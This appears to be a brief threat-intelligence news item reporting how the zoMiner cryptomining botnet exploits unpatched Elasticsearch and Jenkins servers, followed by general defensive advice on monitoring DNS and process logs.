After being discovered in November 2020, the zoMiner botnet has shifted directions to target vulnerable versions of Elasticsearch and Jenkins servers. According to Qihoo 360’s Network Security Research Lab, the botnet is scanning for unpatched versions of Elasticsearch and Jenkins in an attempt to exploit CVE-2015-1427 for Elasticsearch and an unmentioned CVE for Jenkins. The exploit will attempt to download and execute a shell script listed as a txt file. Once the shell script is launched, zoMiner will attempt to terminate any competing miners on the host, set up persistence via cron, and start the miner. Currently zoMiner has amassed over $4,500 USD worth of cryptocurrency.
zoMiner Botnet is Targeting Elasticsearch and Jenkins Servers
Exploiting vulnerable versions of software like Elasticsearch or Jenkins is right in line with how other botnet operators have run campaigns in the past and will likely remain a popular attack method. Being sure to collect and monitor DNS logs to catch hosts reaching out to popular cryptocurrency pools and collecting process logs from hosts can be an invaluable tool to protect an organization and its servers. While cryptocurrency mining has always been viewed as small fish compared to ransomware and other risks in the current threat landscape, there are still reasons to get ahead in protecting valued hosts. In the past, sophisticated threat actors have used miners as a guise for data exfiltration, which poses a significant threat to organizations. As the world of entry-as-a-service expands with malspam, it is important to protect against all forms of unauthorized remote access, no matter how great or small the initial damage appears to be. Any type of remote code execution that is allowed to persist can quickly turn into a major incident at the whim of the attacker.